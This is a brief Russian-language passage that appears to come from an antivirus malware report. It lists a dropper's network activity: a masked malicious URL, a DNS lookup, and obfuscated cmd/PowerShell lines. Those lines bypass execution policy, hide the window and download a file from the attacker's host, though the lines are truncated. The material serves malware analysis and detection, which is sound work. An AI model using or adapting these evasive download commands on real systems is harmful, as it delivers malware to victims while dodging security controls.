Техническая информация
- http://www.ap###styc.top/search.php?f=###### как %appdata%.exe
- DNS ASK ap###styc.top
- '<SYSTEM32>\cmd.exe' /c POw^ershe^ll.eXe -ex^ecut^iO^Np^OLicY ^b^Yp^ass^ -N^O^p^roF^iL^e^ -wINdo^wst^Y^l^e h^iddeN (N^ew-oBJe^ct^ sys^te^m.^N^et^.^webc^L^ie^nt)^.dOwN^LOa^dfile('http://www.ap###s...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c POw^ershe^ll.eXe -ex^ecut^iO^Np^OLicY ^b^Yp^ass^ -N^O^p^roF^iL^e^ -wINdo^wst^Y^l^e h^iddeN (N^ew-oBJe^ct^ sys^te^m.^N^et^.^webc^L^ie^nt)^.dOwN^LOa^dfile('http://www.ap###s...